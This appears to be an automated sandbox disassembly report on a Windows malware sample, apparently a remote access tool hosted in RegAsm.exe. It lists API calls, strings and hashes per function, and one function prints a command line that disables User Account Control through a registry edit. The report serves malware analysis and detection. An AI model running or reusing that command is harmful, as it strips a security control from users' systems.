                    • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                    • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                    Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ClassCreateErrorLastRegisterWindow
                    • String ID: 0$MsgWindowClass
                    • API String ID: 2877667751-2410386613
                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                    Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                    • CloseHandle.KERNEL32(?), ref: 004077AA
                    • CloseHandle.KERNEL32(?), ref: 004077AF
                    Strings
                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreateProcess
                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                    • API String ID: 2922976086-4183131282
                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                    Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                    Download Yara Rule
                    Strings
                    • SG, xrefs: 004076DA
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    • API String ID: 0-643455097
                    • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                    • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                    Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                    • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                    Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                    • CloseHandle.KERNEL32(?), ref: 00405140
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                    • String ID: KeepAlive | Disabled
                    • API String ID: 2993684571-305739064
                    • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                    • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                    Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                    • Sleep.KERNEL32(00002710), ref: 0041AE07
                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: PlaySound$HandleLocalModuleSleepTime
                    • String ID: Alarm triggered
                    • API String ID: 614609389-2816303416
                    • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                    • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                    • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                    • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                    Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                    • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                    Strings
                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                    • API String ID: 3024135584-2418719853
                    • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                    • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                    • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                    • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                    Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                    • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                    • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                    • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                    Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • _free.LIBCMT ref: 00444E06
                    • _free.LIBCMT ref: 00444E1D
                    • _free.LIBCMT ref: 00444E3C
                    • _free.LIBCMT ref: 00444E57
                    • _free.LIBCMT ref: 00444E6E
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID:
                    • API String ID: 3033488037-0
                    • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                    • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                    • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                    • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                    Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                    • _free.LIBCMT ref: 004493BD
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00449589
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                    • String ID:
                    • API String ID: 1286116820-0
                    • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                    • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                    • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                    • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                    Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                    • String ID:
                    • API String ID: 4269425633-0
                    • Opcode ID: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                    • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                    • Opcode Fuzzy Hash: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                    • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                    Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                    • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                    • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                    • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                    Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                    • __alloca_probe_16.LIBCMT ref: 004511B1
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                    • __freea.LIBCMT ref: 0045121D
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 313313983-0
                    • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                    • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                    Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                    • _free.LIBCMT ref: 0044F3BF
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                    • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                    • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                    • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                    Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                    • _free.LIBCMT ref: 004482D3
                    • _free.LIBCMT ref: 004482FA
                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                    • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                    Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 004509D4
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 004509E6
                    • _free.LIBCMT ref: 004509F8
                    • _free.LIBCMT ref: 00450A0A
                    • _free.LIBCMT ref: 00450A1C
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                    Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00444066
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00444078
                    • _free.LIBCMT ref: 0044408B
                    • _free.LIBCMT ref: 0044409C
                    • _free.LIBCMT ref: 004440AD
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                    Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • _strpbrk.LIBCMT ref: 0044E738
                    • _free.LIBCMT ref: 0044E855
                      • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                      • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                      • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                    • String ID: *?$.
                    • API String ID: 2812119850-3972193922
                    • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                    • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                    • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                    • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                    Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                      • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                    • String ID: XQG$NG$PG
                    • API String ID: 1634807452-3565412412
                    • Opcode ID: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                    • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                    • Opcode Fuzzy Hash: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                    • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                    Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                    Download Yara Rule
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: `#D$`#D
                    • API String ID: 885266447-2450397995
                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                    Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63B11986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
